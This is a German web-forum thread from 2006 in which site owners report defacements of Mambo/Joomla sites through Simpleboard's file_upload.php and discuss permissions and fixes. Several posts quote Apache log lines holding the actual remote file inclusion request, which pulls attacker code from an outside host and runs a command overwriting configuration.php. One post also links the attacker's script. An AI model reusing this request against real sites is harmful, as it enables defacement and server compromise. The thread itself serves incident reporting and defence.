Thema: Sicherheitsrisiko Simpleboard

Hallo

Mir wurde gerade die configurations.php überschieben.

Habe nun folgendes im Log gefunden:

85.98.82.11 - - [09/Jul/2006:19:29:17 +0200] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.freewebtown.com/england90/tool25.gif?&cmd=cd%20..;cd%20..;echo%20by%20Thehac ker%20Ownz%20you%20System>index.php HTTP/1.0" 200 11495 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

85.98.82.11 - - [09/Jul/2006:19:32:05 +0200] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.freewebtown.com/england90/tool25.gif?&cmd=cd%20..;cd%20..;echo%20by%20Thehac ker%20Ownz%20you%20System>configuration.php HTTP/1.0" 200 11511 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

da ich die Webseite eh gerade am entfernen bin und auf Joomla umsteige, ist es nicht so schlimm. Auf der neuen Seite habe ich joomlaboard installiert.
Ist das ein Risiko, Problem von Simpleboard? Oder habe ich einfach die Filerechte falsch eingestellt?

mfg
sebastian

Denke mir das du auch die 1.0.x einsetzt derzeit gibt es diverse Hacker
die diesen Fehler ausnutzen...
http://forum.mamboserver.com/showthr...ht=simpleboard

also die neue Site basiert auf dem aktuellen Joomla mit joomlaboard..

die Seite die gehackt wurde, war allerdings noch Mambo mit Simpleboard. Da ich die Seite eh gerade am löschen war, weiss ich nicht mehr welche Rechte die Files hatten... kann da nicht mehr sagen..

Auf der neuen Seite schaue ich aber etwas genauer auf die Rechte.

mfg
sebastian

Hallo Leute,

kann die oben beschriebene Lücke im Simpleboard 1.1.0 bestätigen, hier bei meinem Mambo 4.5.3h mit allen bekannten Security-Fixes bis heute ...

Es betrifft tatsächlich die Datei file_upload.php von Simpleboard, denn auch in unseren Logs hat derselbe Zocker zugeschlagen und ich wüßte gerne, wie man dies - ausser durch umbenennen (unter Verlust der Upload-Funktion) "fixen" kann.

Ausserdem hat die Datei image_upload einen vergleichbaren Aufbau und require_once-Zeile, könnte dies hier auch passieren?

Ich vermute: ja!

Ach ja, habe mal mit Joomlaboard verglichen, die Version 1.1.2 enthält am Dateibegin zusätzlich:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );

Diese Zeile habe ich bei den beiden betroffenen Dateien eingefügt, in der Hoffnung, dass dies hilft. Kann mir ein PHP/Joomla/Mambo-Profi bestätigen, dass dies das Problem fixt und danach dies hier nicht mehr möglich ist:

dsl85-98-21003.ttnet.net.tr - - [09/Jul/2006:23:20:11 +0200] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.freewebtown.com/england90/tool25.gif?&cmd=cd%20..;cd%20..;echo%20by%20Thehac ker%20Ownz%20you%20System>configuration.php HTTP/1.0" 200 11634 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Die betroffene Datei war bei uns nur index.php, weil die configuration.php 444 als Rechte hatte.

Ach so, bevor jemand fragt: Umstieg auf Joomla ist auf unserer Site zwar geplant, aber derzeit wegen der Migration einiger inkompatibler Komponenten noch etwas hinausgezögert.



Mike
Dokolounge.de

Zitat von octane

Kannst ja probieren ob Joomlaboard auf Mambo läuft. Aktuell ist übrigens Mambo 4.5.4 + Sicherheitspatch. Hab auch mal was von einem Mamboboard gelesen das ebenfalls auf Simpleboard basiert. Also gibts auch für Mambo neuere und sicherere Alternativen.

Hallo und danke für den Hinweis auf Mamboboard. Da gibt es tatsächlich was! Unsere Mambo-Version ist 4.5.4 + Patch. das ist also ok. Aber wir kümmern uns wohl doch auch um die kurzfristige Migration nach Joomla, weil wir neue Sites eh schon in Joomla laufen haben und wir so nicht ständig zwei auseinanderlaufende Systeme aktuell halten müssen ... geraten hat man uns schon länger dazu - aber Ihr müsst zugeben, dass es bei Joomla auch einige Startschwierigkeiten gab/gibt. Das wollten wir dann doch erst einmal abwarten, bevor wir migrieren.

Gruß

Mike

Hallo!
Hab das selbe Problem. Bei mir probierten Sie es mit der index.php (keine schreibrechte - somit auch kein schaden) und der configuration.php (schreibrechte und somit überschrieben).
Im Apache Log war folgendes zu finden:

85.98.215.8 - - [10/Jul/2006:16:31:06 +0200] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.freewebtown.com/england90/tool25.gif?&cmd=cd%20..;cd%20..;echo%20by%20Thehac ker%20Ownz%20you%20System>configuration.php HTTP/1.0" 200 11347 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

Ich werde nun auch diese upload.php entfernen solange ich keine bessere Lösung habe. Wenn Ihr was entdeckt wäre ich Euch dankbar wenn Ihr es hierher postet.

Achja: Zum Testen kann man diese Adresse selber im Browser eingeben. Dann wird die Datei genauso überschrieben... Interessant finde ich auch diese Seite:
http://www.freewebtown.com/england90/tool25.gif
Das ist anscheinend der Code der Hacker...

Ich hab Mambo 4.52 und Simpleboard 1.10

zuerst war die index.php dran dann die configuration und als nächstes hatte ich eine index.htm im Root liegen die auf eine andere Seite weiterleitet. Habe jetzt mal beim Simplebord die File_upload.php entfernt. Übrigens ist das unter Joomla 1.0.10 und simpleboard 1.1.0 passiert. Ich hoffe ich habe jetzt etwas Ruhe.